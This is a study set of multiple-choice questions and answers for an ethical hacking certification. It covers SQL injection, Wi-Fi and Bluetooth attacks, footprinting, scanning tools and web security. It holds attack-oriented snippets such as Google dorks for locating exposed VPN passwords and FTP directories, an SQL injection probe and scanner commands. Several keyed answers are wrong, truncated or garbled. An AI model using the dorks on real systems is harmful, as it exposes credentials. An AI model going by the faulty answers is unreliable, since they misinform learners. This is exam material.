Ethical Hacking
In one of the following method an attacker attempts to replicate error free navigation by inputting simple input - Determining the database engine type - Type mismatch - Parameter tampering - Determining a SELECT query structure
- Determining a SELECT query structure
Which of the following attacks can take place due to flaws such as insecure cryptographic storage and information leakage? - SQL injection - Shell injection - Sensitive data exposure - Command injection
- Sensitive data exposure
Which of the following is a communication standard that is also known as WiMAX and is designed to provide multiple physical layer (PHY) and MAC options? - 802.11g - 802.16 - 802.11n - 802.15.1
802.16
Which of the following techniques is NOT a best practice for securing webhooks? - Use rate limiting on webhook calls in the web server - Use threaded requests to send multiple requests simultaneously - Avoid validating the X-OP-Timestamp within the threshold of the current time - Ensure that event processing is idempotent
Avoid validating the X-OP-Timestamp within the threshold of the current time
Which of the following tools is employed by a pen tester to find vulnerabilities in an organization's web server and evaluate its security posture by using the same techniques as those currently employed by cybercriminals? - Netcraft - NetVizor - CORE Impact - Pupy
CORE Impact
Which of the following involves injection of malicious html code through a web application? - LDAP injection - Shell injection - SQL injection - Command injection
Command injection
Identify the reason why Web Applications are vulnerable to SQL injection attacks. - Tests the content of string variables and accepts only expected values. - Error messages reveal important information - Avoid constructing dynamic SQL with concatenated input values - Reject entries that contain binary data, escape sequences, and comment characters.
Error messages reveal important information
Which of the following is considered as a quality checking and assurance technique used to identify coding errors and security loopholes in web applications? - Hash stealing - Fuzz testing - Session hijacking - Sandboxing
Fuzz testing
Which of the following methods carries the requested data to the webserver as a part of the message body? - Cold fusion - IBM DB2 - HTTP POST - HTTP GET
HTTP POST
If a tester is attempting to ping a target that exists but receives no response or a response that states the destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option could the tester use to get a response from a host using TCP? - Broadcast ping - Traceroute - Hping - TCP ping
Hping
In which of the following attacks does an attacker use the same communication channel to perform the attack and retrieve the results? - Inferential SQL injection - Out-of-band SQL injection - In-band SQL injection - Blind SQL injection
In-band SQL injection
Which of the following is a built-in tool of Burp Suite that is used for inspecting and modifying traffic between a browser and target application? - Sequencer tool - Application-aware - Intruder tool - Intercepting proxy
Intercepting proxy
Which of the following protocols uses the port number 88/TCP and can verify the identity of a user or host connected to a network? - Kerberos - Finger - NTP - TFTP
Kerberos
Which of the following tools helps attackers identify networks by passively collecting packets and detecting standard named networks, hidden networks, and the presence of non-beaconing networks via data traffic? - Kismet - L0phtCrack - Netcraft - Robber
Kismet
Which of the following operating systems can be identified when scan results show a TTL value of 64 and TCP window size of 5840? - Linux (Kernel 2.4 and 2.6) - Solaris 7 - iOS 12.4 - Windows XP
Linux (Kernel 2.4 and 2.6)
Which of the following tools does an attacker use to perform SQL injection exploitation through techniques such as union and blind SQL exploitation and bypass certain IPS/IDS rules with generic filters? - Mole - Astra - Weevely - China Chopper
Mole
hich of the following web services is a repository that contains a collection of user-submitted notes or messages on various subjects and topics? - Online reputation services - People search services - NNTP Usenet newsgroups - Business profile sites
NNTP Usenet newsgroups
Which of the following protocol encapsulates the EAP within an encrypted and authenticated Transport Layer Security (TLS) tunnel? - RADIUS - PEAP - LEAP - CCMP
PEAP
Which of the following technologies belongs to the application layer and is used to generate dynamic web content? - Apache - Linux - MySQL - PHP
PHP
Which of the following features in FOCA allows an attacker to find more servers in the same segment of a determined address? - DNS search - IP resolution - Web search - PTR scanning
PTR scanning
Which of the following attacks is possible when an attacker executes .bat or .cmd files and changes the values by superimposing one or more operating-system commands through the request? - WS-address spoofing - XML injection attack - Parsing attack - SOAPAction spoofing
Parsing attack
A penetration tester was hired to perform a penetration test for a bank. The tester began searching for IP ranges owned by the bank, performing lookups on the bank's DNS servers, reading news articles online about the bank, watching the bank employees time in and out, searching the bank's job postings (paying special attention to IT-related jobs), and visiting the local dumpster for the bank's corporate office. What phase of the penetration test is the tester currently in? - Passive information gathering - Information reporting - Vulnerability assessment - Active information gatherin
Passive information gathering
In which of the following attacks does an attacker inject an additional malicious query into an original query to make the DBMS execute multiple SQL queries? - System stored procedure - Illegal/logically incorrect query - Tautology - Piggybacked query
Piggybacked query
In which of the following attacks does an attacker inject an additional malicious query to the original query? - Tautology - In-line comment - Piggybacked query - UNION SQL injection
Piggybacked query
In which type of fuzz testing does the protocol fuzzer send forged packets to the target application that is to be tested? - None of the above - Generation-based - Protocol-based - Mutation-based
Protocol-based
Which of the following is the result obtained after the SQL query "SELECT * From User_Data Where Email_ID
Return data mode
Which of the following DNS record types indicates the authority for a domain of the target DNS server? - SRV - PTR - SOA - CNAME
SOA
Which of the following built-in tools of Burp Suite is used for testing the randomness of session tokens? - Application-aware spider - Sequencer tool -Intruder tool - Intercepting proxy
Sequencer tool
Which of the following does not provide cryptographic integrity protection? - WPA2 - WPA - WEP - TKIP
WEP
Which of the following techniques is NOT a countermeasure for securing files and directories on a web server? - Eliminate sensitive configuration information within the byte code - Disable the serving of directory listings - Eliminate unnecessary files within.jar files - Map virtual directories between two different servers or over a network
Map virtual directories between two different servers or over a network
Which of the following techniques is NOT a countermeasure for securing files and directories on a web server? - Map virtual directories between two different servers or over a network - Disable the serving of directory listings - Eliminate unnecessary files within.jar files - Eliminate sensitive configuration information within the byte code
Map virtual directories between two different servers or over a network
Which of the following is a DNS interrogation tool that allows an attacker to retrieve information about the location and type of servers related to the target web infrastructure? - Halberd - Vega - WAFW00F - Professional Toolset
Professional Tool-set
In which of the following database technologies is the SQL query [ Select * from sycat.coloumns where tabname='table name'] used for column enumeration. - MySQL - MSSQL - DB2 - Oracle
DB2
Which of the following is used to detect bugs and irregularities in web applications? - Mutation-based fuzz testing - Protocol-based fuzz testing - Generation-based fuzz testing - Source code review
Source code review
Which of the following types of DNS records points to a host's IP address? - TXT - A - HINFO - NS
A
Which of the following tools is used to build rules that aim to detect SQL injection attacks? - Super Scan - Snort - Nmap - Masscan
Snort
An attacker is using the scanning tool Hping to scan and identify live hosts, open ports, and services running on a target network. He/she wants to collect all the TCP sequence numbers generated by the target host. Which of the following Hping commands he/she needs to use to gather the required information? - hping3 -S <Target IP> -p 80 --tcp-timestamp - hping3 -F -P -U 10.0.0.25 -p 80 - hping3 <Target IP> -Q -p 139 -s - hping3 -A <Target IP> -p 80
hping3 <Target IP> -Q -p 139 -s
Which of the following is the Google dork that helps an attacker find the configuration pages for online VoIP devices? - intitle:"Sipura.SPA.Configuration" -.pdf - intitle:"SPA504G Configuration" - inurl:/voice/advanced/ - intitle:Linksys SPA configurationintitle:"Login Page" intext:"Phone Adapter Configuration Utility"
intitle:"Sipura.SPA.Configuration" -.pdf
Which one of the following is a Google search query used for VoIP footprinting to extract Cisco phone details? - intitle:"D-Link VoIP Router" "Welcome" - inurl:"NetworkConfiguration" cisco - inurl:/voice/advanced/ - intitle:Linksys SPA configuration - inurl:"ccmuser/logon.asp"
inurl:"NetworkConfiguration" cisco
In blind SQLi, attackers can steal data by asking a series of true or false questions through SQL statements. Select all the correct types of blind SQL injections. - Boolean exploitation - Tautology - Time delay - System-stored procedure
- Boolean exploitation - Time delay
WPA2 uses AES for wireless data encryption at which of the following encryption levels? - 128 bit and TKIP - 128 bit and CCMP - 128 bit and CRC - 64 bit and CCMP
28 bit and CCMP
Which of the following is a standard for Wireless Local Area Networks (WLANs) that provides improved encryption for networks that use 802.11a, 802.11b, and 802.11g standards? - 802.11i - 802.11e - 802.11d - 802.11n
802.11i
Which of the following tools provides automated web application security testing with innovative technologies including DeepScan and AcuSensor technology? - IBM Security AppScan - Hping2 / Hping3 - SoftPerfect network scanner - Acunetix web vulnerability scanner
Acunetix web vulnerability scanner
In which of the following is the original data signal multiplied with a pseudo random noise spreading code? - Direct-sequence Spread Spectrum (DSSS) - Orthogonal Frequency-division Multiplexing (OFDM) - Frequency-hopping Spread Spectrum (FHSS) - Multiple input, multiple output-orthogonal frequency-division multiplexing (MIMO-OFDM)
Direct-sequence Spread Spectrum (DSSS)
Which of the following is NOT an objectives of network scanning? - Discover the services running - Discover usernames and passwords - Discover the network's live hosts - Discover the services running
Discover usernames and passwords
Which of the following should NOT be followed when securing an organization from footprinting attacks? - Educating employees to use pseudonyms on blogs, groups, and forums - Enabling the geo-tagging functionality on cameras - Ensuring that critical information is not revealed in press releases, annual reports, product catalogs, and so on. - Opting for privacy services on the Whois lookup database
Enabling the geo-tagging functionality on cameras
There is a WEP encrypted wireless AP with no clients connected. In order to crack the WEP key, a fake authentication needs to be performed. Which of the following steps need to be performed by the attacker for generating fake authentication? - Set the wireless interface to monitor mode - Ensure association of source MAC address with the AP - Capture the IVs - Use cracking tools
Ensure association of source MAC address with the AP
You are doing research on SQL injection attacks. Which of the following combination of Google operators will you use to find all Wikipedia pages that contain information about SQL, injection attacks, or SQL injection techniques? - site:Wikipedia.org intitle:"SQL Injection" - allinurl: Wikipedia.org intitle:"SQL Injection" - SQL injection site:Wikipedia.org - site:Wikipedia.org related:"SQL Injection"
SQL injection site:Wikipedia.org
Which of the following is considered as a token to identify a 802.11 (Wi-Fi) network (by default it is the part of the frame header sent over a wireless local area network (WLAN))? - Association - Access point - Hotspot - SSID
SSID
Which of the following is to be used to keep certain default wireless messages from broadcasting the ID to everyone? - Bluejacking - Bluesmacking - MAC Spoofing - SSID Cloaking
SSID Cloaking
During a wireless penetration test, a tester detects an AP using the WPA2 encryption. Which of the following attacks should be used to obtain the key? - The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard. - The tester must capture the WPA2 authentication handshake and then crack it. - The tester must change the MAC address of the wireless network card and then use the AirTraf tool to obtain the key. - The tester must use the tool inSSIDer to crack it using the ESSID of the network.
The tester must capture the WPA2 authentication handshake and then crack it.
Which of the following btlejack commands allows an attacker to sniff new Bluetooth low-energy connections? - btlejack -c any - btlejack -f 0x129f3244 -j - btlejack -s - btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s
btlejack -c any
Which of the following TCP communication flags confirms the receipt of a transmission and identifies the next expected sequence number? - SYN flag - RST flag - ACK flag - FIN flag
ACK flag
Which of the following cryptographic algorithms is used by CCMP? - DES - TKIP - AES - RC4
AES
In which of the following attacks does an attacker saturate an API with a massive volume of traffic from multiple infected computers or botnets to delay the API services to legitimate users? - Invalid input attack - Credential stuffing attack - Fuzzing - API DDoS attack
API DDoS attack
Which of the following is used to connect wireless devices to a wireless/wired network? - Association - Bandwidth - Access point (AP) - Hotspot
Access point (AP)
What type of OS fingerprinting technique sends specially crafted packets to the remote OS and analyzes the received response? - Active - Reflective - Passive - Distributive
Active
Which of the following stores critical HTML files related to the webpages of a domain name that will be served in response to requests? - Document root - Virtual document tree - Server root - Web proxy
Document root
If you are responsible for securing a network from any type of attack and if you have found that one of your employees is able to access any website that may lead to clickjacking attacks, what would you do to avoid the attacks? - Delete Cookies - Enable Remote Management - Harden browser permission rules - Configure Application certification rules
Harden browser permission rules
In which of the following scanning techniques does an attacker send a spoofed source address to a computer to determine the available services? - Inverse TCP flag scan - ACK flag probe scan - IDLE/IPID header scan - TCP Maimon scan
IDLE/IPID header scan
An attacker wants to exploit a webpage. From which of the following points does he start his attack process? - Identify server-side functionality - Map the attack surface - Identify entry points for user input - Identify server-side technologies
Identify entry points for user input
Which of the following countermeasures should be followed to defend against DNS hijacking? - Do not safeguard the registrant account information - Use the default router password included in the factory settings - Download audio and video codecs and other downloaders from untrusted websites - Include DNS hijacking into incident response and business continuity planning
Include DNS hijacking into incident response and business continuity planning
In which type of fuzz testing do the current data samples create new test data and the new test data again mutates to generate further random data? - Mutation-based - None of the above - Generation-based - Protocol-based
Mutation-based
Which of the following web-service APIs is programmed to generate, recover, modify, and erase different logs such as profiles, credentials, and business leads? - RESTful API - XML RPC - JSON RPC - SOAP API
SOAP API
Which of the following web-service APIs is programmed to generate, recover, modify, and erase different logs such as profiles, credentials, and business leads? - XML-RPC - SOAP API - RESTful API - JSON-RPC
SOAP API
Which of the following attacks allows an attacker to inject malicious content, modify the user´s online experience, and obtain unauthorized information? - Cross-site request forgery - Session prediction - Session poisoning - Session brute-forcing
Session poisoning
In which of the following footprinting threats does an attacker collect information directly and indirectly through persuasion without using any intrusion methods? - Business loss - Corporate espionage - System and network attack - Social engineering
Social engineering
Which of the following API hacking techniques does not target the API or machine code and instead tricks users into divulging their credentials to perform further attacks? - Session replay attack - Social engineering - User spoofing - Reverse engineering
Social engineering
hich of the following countermeasures prevents buffer overruns? - Keep untrusted data separate from commands and queries. - Use the most restrictive SQL account types for applications. - Test the size and data type of the input and enforce appropriate limits. - Apply the least privilege rule to run the applications that access the DBMS.
Test the size and data type of the input and enforce appropriate limits
Which of the following conditions must be given to allow a tester to exploit a cross-site request forgery (CSRF) vulnerable web application? - The victim user must open a malicious link with an Internet Explorer prior to version 8. - The session cookies generated by the application do not have the HttpOnly flag set. - The victim user must open a malicious link with Firefox prior to version 3. - The web application should not use random tokens.
The web application should not use random tokens.
In which of the following attacks does an attacker use an ORDER BY clause to find the right number of columns in a database table? - In-line comments - UNION SQL injection - Tautology - Piggybacked query
UNION SQL injection
Which of the following includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)? - WPA2 - WEP - TKIP - WPA
WPA2
In one of the following defensive techniques, only the list of entities such as data type, range, size, and value that have been approved for secured access are accepted. Which is this technique? - Whitelist validation - Output encoding - Enforcing least privileges - Blacklist validation
Whitelist validation
Which of the following networks is used for very long-distance communication? - Wi-Fi - Bluetooth - ZigBee - WiMax
WiMax
Which of the following Google search queries allows an attacker to identify the FTP servers of the target organization and identify sensitive directories on FTP? - intext:pure-ftpd.confintitle:index of - type:mil inurl:ftp ext:pdf | ps - inurl:"ftp://www." "Index of /" - inurl:github.com intext:.ftpconfig -issues
type:mil inurl:ftp ext:pdf | ps
Which of the following utilities is used by Recon-Dog to detect technologies existing in the target system? - shodan.io - Whois lookup - findsubdomains.com - wappalyzer.com
wappalyzer.com
In which of the following attacks does an attacker load the target website inside a low-opacity iframe? - DNS rebinding attack - RC4 NOMORE attack - Clickjacking attack - JavaScript hijacking
- Clickjacking attack
If a threat detection software installed in any organization network either does not record the malicious event or ignores the important details about the event, then what kind of vulnerability is it? - Security misconfiguration - Broken access control - Insufficient logging and monitoring - Sensitive data exposure
- Insufficient logging and monitoring
Which of the following countermeasures should be followed for the secure update and patch management of web servers? - Apply all updates, regardless of their type, on an "as-needed" basis - Use the default configurations that web servers are dispatched with - Never use virtual patches in the organization Enable all unused script extension mappings
Apply all updates, regardless of their type, on an "as-needed" basis
Which of the following is a timing attack performed by measuring the approximate time taken by a server to process a POST request so that the existence of a username can be deduced? - Cache storage timing attack - Cross-site timing attack - Browser-based timing attack - Direct timing attack
Direct timing attack
Which of the following HTTP service port numbers is used for connecting to a remote network server system? - Port 384 - Port 81 - Port 80 - Port 88
Port 384
Which of the following Google dorks is used by an attacker to find Cisco VPN client passwords? - "Config" intitle:"Index of" intext:vpn - filetype:pcf vpn OR Group - "[main]" "enc_GroupPwd=" ext:txt - filetype:pcf "cisco" "GroupPwd"
"[main]" "enc_GroupPwd=" ext:txt
William has been hired by the ITSec, Inc. to perform web application security testing. He was asked to perform black box penetration testing to test the security of the company's web applications. No information is provided to William about the company's network and infrastructure. William notices that the company website is dynamic and must make use of a backend database. He wants to see if an SQL injection would be possible. As part of the testing, he tries to catch instances where the user input is used as part of an SQL identifier without any input sanitization. Which of the following characters should William use as the input data to catch the above instances? - Right square bracket - Semicolon - Double quote - Single quote
- Double quote - Single quote
To defend against SQL injection, a developer needs to take proper actions in configuring and developing an application. Select all correct statements that help in defending against SQL injection attacks. - Keep untrusted data separate from commands and queries. - Apply input validation only on the client-side. - Ensure that the Web configuration files for each application do not contain sensitive information. - Avoid constructing dynamic SQL with concatenated Input values.
- Keep untrusted data separate from commands and queries. - Ensure that the Web configuration files for each application do not contain sensitive information. - Avoid constructing dynamic SQL with concatenated Input values.
A tester has been hired to perform source code review of a web application to detect SQL injection vulnerabilities. As part of the testing process, he needs to get all the information about the project from the development team. During the discussion with the development team, he comes to know that the project is in the initial stage of the development cycle. As per the above scenario, which of the following processes does the tester need to follow in order to save the company's time and money? - The tester needs to perform dynamic code analysis as it uncovers bugs in the software system. - The tester needs to perform static code analysis as it covers the executable file of the code. - The tester needs to perform dynamic code analysis as it finds and fixes the defects. - The tester needs to perform static code analysis as it covers the structural and statement coverage testing.
- The tester needs to perform static code analysis as it covers the structural and statement coverage testing.
Which of the following wireless standards uses modulation schemes such as GFSK, π/4-DPSK, and 8DPSK and a frequency of 2.4 GHz with data transfer rates in the range of 25-50 Mbps? - 802.11g - 802.15.1 (Bluetooth) - 802.11a - 802.16 (WiMAX)
802.15.1 (Bluetooth)
Which of the following is a type of access-control attack in which an attacker uses any USB adapter or wireless card and connects a host to an unsecured client to attack a specific client or to avoid AP security? - Ad hoc association - Promiscuous client - Client mis-association - Unauthorized association
Ad hoc association
Which of the following countermeasures should be followed to protect web applications against broken authentication and session management attacks? - Apply pass phrasing with at least five random words - Never use SSL for all authenticated parts of the application - Submit session data as part of GET and POST - Do not check weak passwords against a list of the top bad passwords
Apply pass phrasing with at least five random words
Which of the following activities of an organization on social networking sites helps an attacker footprint or collect information regarding the type of business handled by the organization? - Promotion of products - User surveys - Background checks to hire employees - User support
Background checks to hire employees
Which of the following terms describes the amount of information that may be broadcast over a connection? - BSSID - Bandwidth - ISM band - Hotspot
Bandwidth
Which of the following techniques helps the attacker in identifying the OS used on the target host in order to detect vulnerabilities on a target system? - Banner grabbing - Port scanning - Source routing - IP address decoy
Banner grabbing
In which of the following attacks does an attacker pose a true or false question to an database to determine whether an application is vulnerable to SQL injection? - Error-based SQL injection - Union SQL injection - In-Band SQL injection - Blind SQL injection
Blind SQL injection
In which of the following techniques does an attacker use logical requests such as AND/OR to bypass a firewall? - Normalization method - CRLF technique - HPF technique - Blind SQL injection
Blind SQL injection
Which of the following attacks is time-intensive because the database should generate a new statement for each newly recovered bit? - In-band SQL injection - Error-based SQL injection - UNION SQL injection - Blind SQL injection
Blind SQL injection
An attacker collects the make and model of target Bluetooth-enabled devices analyzes them in an attempt to find out whether the devices are in the range of vulnerability to exploit. Identify which type of attack is performed on Bluetooth devices. - Blue Printing - BlueSniff - MAC Spoofing Attack - Bluebugging
Blue Printing
_________ is the art of collecting information about Bluetooth enabled devices such as manufacturer, device model and firmware version. - Bluejacking - BluePrinting - Bluebugging - BlueSniff
BluePrinting
Which of the following terms is used to describe an attack in which an attacker gains remote access to a target Bluetooth-enabled device without the victim being aware of it? - Bluejacking - Bluesnarfing - Bluebugging - Bluesmacking
Bluebugging
Thomas is a cyber thief trying to hack Bluetooth-enabled devices at public places. He decided to hack Bluetooth-enabled devices by using a DoS attack. He started sending an oversized ping packet to a victim's device, causing a buffer overflow and finally succeeded. What type of Bluetooth device attack is Thomas most likely performing? - Bluebugging - Bluesnarfing - Bluesmacking - Bluejacking
Bluesmacking
An attacker wants to perform a session hijacking attack. What tool should he use to achieve his objective? - Netcraft - Nessus - Burp suite - Hydra
Burp suite
Which of the following is not a patch management tool? - GFI LanGuard - Software vulnerability manager - Burp suite - Symantec client management suite
Burp suite
Steve, an attacker, wants to track the most shared content that belongs to the target organization. For this purpose, he used an advanced social search engine that displayed shared activity across all major social networks including Twitter, Facebook, LinkedIn, Google Plus, and Pinterest. What is the tool employed by Steve in the above scenario? - Robber - Vindicate - BuzzSumo - Wireshark
BuzzSumo
Which of the following techniques is used by an attacker to connect a fake account on the provider with a victim's account on the client side? - Attack on "Connect" request - CSRF on authorization response - Attack on "redirect_uri" - Access token reusage
CSRF on authorization response
Which of the following is the most effective technique in identifying vulnerabilities or flaws in the web page code? - Packet analysis - Code analysis - Traffic analysis - Data analysis
Code analysis
Which of the following types of API vulnerabilities occurs when an input is not sanitized and can be exploited by adding malicious SQL statements to input fields to steal session cookies and user credentials? - Code injections - Business logic flaws - Improper use of CORS - Sharing resources via unsigned URLs
Code injections
Which of the following types of API vulnerabilities occurs when an input is not sanitized and can be exploited by adding malicious SQL statements to input fields to steal session cookies and user credentials? - Improper use of CORS - Code injections - Business logic flaws - Sharing resources via unsigned URLs
Code injections
Mark is working as a penetration tester in InfoSEC, Inc. One day, he notices that the traffic on the internal wireless router suddenly increases by more than 50%. He knows that the company is using a wireless 802.11 a/b/g/n/ac network. He decided to capture live packets and browse the traffic to investigate the issue to find out the actual cause. Which of the following tools should Mark use to monitor the wireless network? - WiFish Finder - BlueScan - WiFiFoFum - CommView for WiFi
CommView for WiFi
In which of the following SQL injection attacks does an attacker deface a web page, insert malicious content into web pages, or alter the contents of a database? - Compromised data integrity - Authorization bypass - Remote code execution - Compromised availability of data
Compromised data integrity
You are performing a port scan with Nmap. You are in a hurry and conducting the scans at the fastest possible speed. What type of scan should you run to get very reliable results? - XMAS scan - Connect scan - Stealth scan - Fragmented packet scan
Connect scan
Which of the following is a wireless security layer where per frame/packet authentication provides protection against MITM attacks and prevents an attacker from sniffing data when two genuine users communicate with each other? - Wireless signal security - Device security - Connection security - End-user protection
Connection security
What type of information is gathered by an attacker through Whois database analysis and tracerouting? - Usernames, passwords, and so on - Background of the organization - DNS records and related information - Publicly available email addresses
DNS records and related information
Which of the following practices makes web applications vulnerable to SQL injection attacks? - Database server running OS commands - Firewalling the SQL server - Implementing consistent coding standards - Minimizing privileges
Database server running OS commands
Which of the following countermeasure helps organizations to prevent information disclosure through banner grabbing? - Disable open relay feature - Display false banners - Disable the DNS zone transfers to the untrusted hosts - Restrict anonymous access through RestrictNullSessAccess parameter from the Windows registry
Display false banners
Steven, a wireless network administrator, has just finished setting up his company's wireless network. He has enabled various security features such as changing the default SSID and enabling strong encryption on the company's wireless router. Steven decides to test the wireless network for confidentiality attacks to check whether an attacker can intercept information sent over wireless associations, whether sent in clear text or encrypted by Wi-Fi protocols. As a part of testing, he tries to capture and decode unprotected application traffic to obtain potentially sensitive information using hardware or software tools such as Ettercap, Kismet, Wireshark, etc. What type of wireless confidentiality attack is Steven trying to do? - WEP Key Cracking - Eavesdropping - Masquerading - Evil twin AP
Eavesdropping
Which of the following types of techniques is used to prevent IP spoofing by blocking outgoing packets with a source address that is not inside? - Access-control lists - Random initial sequence numbers - Ingress filtering - Egress filtering
Egress filtering
Which of the following tools allows an attacker to extract information such as sender identity, mail server, sender's IP address, location, and so on? - Web updates monitoring tools - Email tracking tools - Metadata extraction tools - Website mirroring tools
Email tracking tools
Which of the following is the best practice to follow to secure a system or network against port scanning? - Do not configure firewall and IDS rules to detect and block probes - Ensure that firewall and routers do not block source routing techniques - Ensure that the versions of services running on the ports are non-vulnerable - Allow unwanted services running on the ports and update the service versions
Ensure that the versions of services running on the ports are non-vulnerable
Which of the following best practices should be followed to prevent web-shell installation? - Activate directory browsing in the web server - Establish a reverse proxy service for retrieving resources - Do not use escapeshellarg() or escapeshellcmd() - Enable all PHP functions such as exec(), shell_exec(), show_source(), proc_open(), passthru(), and pcntl_exec()
Establish a reverse proxy service for retrieving resources
Fill in the blank. Posing as an authorized AP by beaconing the WLAN's service set identifier (SSID) to lure users is known as __________. - Masquerading - Man-in-the-Middle Attack - Honeypot AP - Evil Twin AP
Evil Twin AP
John is a pen tester working with an information security consultant based in Paris. As part of a penetration testing assignment, he was asked to perform wireless penetration testing for a large MNC. John knows that the company provides free Wi-Fi access to its employees on the company premises. He sets up a rogue wireless access point with the same SSID as that of the company's Wi-Fi network just outside the company premises. He sets up this rogue access point using the tools that he has and hopes that the employees might connect to it. What type of wireless confidentiality attack is John trying to do? - WEP Cracking - Evil Twin AP - War Driving - KRACK Attack
Evil Twin AP
Which of the following deep and dark web searching tools helps an attacker obtain information about official government or federal databases and navigate anonymously without being traced? - ExoneraTor - Whitepages - Been Verified - Spokeo
ExoneraTor
Which of the following footprinting techniques allows an attacker to gather information passively about the target without direct interaction? - Performing social engineering - Extracting information using Internet archives - Extracting DNS information - Performing traceroute analysis
Extracting information using Internet archives
Which of the following TCP communication flags is set to "1" to announce that no more transmissions will be sent to the remote system and the connection established by the SYN flag is terminated? - RST flag - FIN flag - SYN flag - ACK flag
FIN flag
A pen tester was hired to perform penetration testing on an organization. The tester was asked to perform passive footprinting on the target organization. Which of the following techniques comes under passive footprinting? - Performing traceroute analysis - Finding the top-level domains (TLDs) and sub-domains of a target through web services - Querying published name servers of the target - Performing social engineering
Finding the top-level domains (TLDs) and sub-domains of a target through web services
Which of the following scanning tools is a mobile app for Android and iOS that provides complete network information, such as the IP address, MAC address, device vendor, and ISP location? - Netcraft - Maltego - Fing - Nmap
Fing
In which of the following attacks does an attacker repeatedly send some random input to a target API to generate error messages that reveal critical information? - Login/credential stuffing attack - Malicious input attack - Invalid input attack - Fuzzing
Fuzzing
Robert, a penetration tester, is trying to perform SQL penetration testing on the SQL database of the company to discover coding errors and security loopholes. Robert sends massive amounts of random data to the SQL database through the web application in order to crash the web application of the company. After observing the changes in the output, he comes to know that the web application is vulnerable to SQL injection attacks. Which of the following testing techniques is Robert using to find out the loopholes? - Stored Procedure Injection - Alternate Encodings - Fuzzing Testing - Out of Band Exploitation
Fuzzing Testing
Which of the following footprinting techniques allows an attacker to gather information about a target with direct interaction? - Gathering infrastructure details of the target organization through job sites - Gathering website information using web spidering and mirroring tools - Gathering financial information about the target through financial services - Gathering information using groups, forums, blogs, and NNTP Usenet newsgroups
Gathering website information using web spidering and mirroring tools
Which of the following ping methods is effective in identifying active hosts similar to the ICMP timestamp ping, specifically when the administrator blocks the conventional ICMP ECHO ping? - ICMP address mask ping scan - ICMP ECHO ping sweep - ICMP ECHO ping scan - UDP ping scan
ICMP address mask ping scan
An Attacker injects the folllowing SQL inquiry: blah' AND=1( Select Count(*) FROM MY TABLE;-- what is the intention of the attacker? - Identifying the table name - Updating table - Deleting a table - Adding new records
Identifying the table name
Which of the following countermeasures should be followed to protect web applications against broken access control? - Implement a session timeout mechanism - Never limit file permissions to authorized users - Never remove session tokens on the server side on user logout - Implement client-side caching mechanisms
Implement a session timeout mechanism
Which of the following tools is used for gathering email account information from different public sources and checking whether an email was leaked using the haveibeenpwned.com API? - Octoparse - Infoga - Professional Toolset - Metagoofil
Infoga
Shea is a licensed penetration tester. She is working with a client to test their new e-commerce website for SQL injection. After signing the NDA and agreeing on the rules of engagement (RoE), she starts by examining and listing all the input fields on the website. She tries to insert a string value in the CVV2 textbox, where a three-digit number is expected, and she ends up with the below error message. Identify in which stage of the SQL injection methodology is Shea right now. - Information gathering and SQL injection vulnerability detection - Exploit second-order SQL injection - Perform blind SQL injection - Launch SQL injection attacks
Information gathering and SQL injection vulnerability detection.
Which of the following API security risks can be prevented by performing input validation, implementing a parameterized interface for processing inbound API requests, and limiting the number of records returned? - Excessive data exposure - Injection - Mass assignment - Security misconfiguration
Injection
Which of the following attack techniques is used by an attacker to send forged control, management, or data frames over a wireless network to misdirect wireless devices and perform other types of attacks such as DoS? - Confidentiality attack - Integrity attack - Authentication attack - Availability attack
Integrity attack
Which of the following countermeasure should be used to prevent a ping sweep? - Limiting ICMP traffic with access-control lists (ACLs) to the ISP's specific IP addresses - Disabling the firewall - Avoiding the use of DMZ and disallowing commands such as ICMP ECHO_REPLY, HOST UNREACHABLE, and TIME EXCEEDED in DMZ - Allowing connection with any host performing more than 10 ICMP ECHO requests
Limiting ICMP traffic with access-control lists (ACLs) to the ISP's specific IP addresses
Which of the following tools is used by an attacker to create rogue APs and perform sniffing and MITM attacks? - Skyhook - MANA Toolkit - Gobuster - Halberd
MANA Toolkit
Which of the following technologies is an air interface for 4G and 5G broadband wireless communications? - DSSS - MIMO-OFDM - OFDM - FHSS
MIMO-OFDM
hich of the following database management systems contains the system table called "MsysObjects"? - MySQL - Oracle - MSSQL - MS Access
MS Access
Which of the following DNS record type helps in DNS footprinting to determine a domain's mail server? - CNAME - NS - A - MX
MX
In which type of fuzz testing do the current data samples create new test data and the new test data again mutates to generate further random data? - Mutation-based - None of the above - Protocol-based -Generation-based
Mutation-based
Which of the following tools is a web-application security scanner that searches for vulnerabilities to attacks such as clickjacking, SQL injection, and XSS? - Vindicate - Immunity Debugger - Mimikatz - N-Stalker X
N-Stalker X
Which of the following open-source tools would be the best choice to scan a network for potential targets? - Cain & Abel - hashcat - John the Ripper - NMAP
NMAP
Which of the following parameters enable NMAP's operating system detection feature? - NMAP -sC - NMAP -oS - NMAP -O - NMAP -sV
NMAP -O
Which NMAP command combination would let a tester scan every TCP port from a class C network that is blocking ICMP with fingerprinting and service detection? - NMAP -PN -O -sS -p 1-1024 192.168.0/8 - NMAP -P0 -A -sT -p0-65535 192.168.0/16 - NMAP -PN -A -O -sS 192.168.2.0/24 - NMAP -P0 -A -O -p1-65535 192.168.0/24
NMAP -PN -A -O -sS 192.168.2.0/24
Which tool would be used to collect wireless packet data? - Nessus - John the Ripper - Netcat - NetStumbler
NetStumbler
Which statement is TRUE regarding network firewalls in preventing web application attacks? - Network firewalls can prevent attacks because they can detect malicious HTTP traffic - Network firewalls cannot prevent attacks because they are too complex to configure - Network firewalls cannot prevent attacks because ports 80 and 443 must be kept opened - Network firewalls cannot prevent attacks if they are properly configured.
Network firewalls cannot prevent attacks because ports 80 and 443 must be kept opened
Smith, a professional hacker, has targeted an organization. He employed some footprinting tools to scan through all the domains, subdomains, reachable IP addresses, DNS records, and Whois records to perform further attacks. What is the type of information Smith has extracted through the footprinting attempt? - Company's product information - Physical security information - Policy information - Network information
Network information
Which of the following API vulnerabilities allows attackers to gain unauthorized access to API objects or perform actions such as viewing, updating, or deleting? - RBAC privilege escalation - Enumerated resources - No ABAC validation - Business logic flaws
No ABAC validation
Which of the following protocols is used by BlueJacking to send anonymous messages to other Bluetooth-equipped devices? - SDP - LMP - OBEX - L2CAP
OBEX
Which of the following functions can be used by an attacker to link a target SQL server's database to the attacker's own machine and retrieve data from the target SQL server database? - LOAD_FILE() - CONVERT() - INTO OUTFILE() - OPENROWSET()
OPENROWSET()
